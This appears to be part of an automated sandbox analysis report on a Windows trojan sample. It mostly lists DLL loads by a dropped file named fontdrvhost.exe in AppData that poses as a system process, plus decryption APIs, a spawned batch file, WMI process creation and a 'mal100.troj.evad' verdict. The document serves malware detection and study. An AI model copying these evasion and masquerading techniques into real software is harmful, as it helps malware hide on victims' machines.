Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: ZT3pxe2Tb4.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs Cryptographic APIs: 'CreateDecryptor'
Source: DnshUSLJ.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tAOrkGQb.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: SKewgrff.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: IbKgwPay.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: zsrQNmVQ.log.0.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@93/244@0/1
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tqrrAUxf.log
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\cfcca84f50e77cb6ac0a04c26d8ae71e39090d16a37d1ce7f59ef27a8be95bc3
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\AppData\Local\Temp\Haf5RcGt9x
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
Source: ZT3pxe2Tb4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZT3pxe2Tb4.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
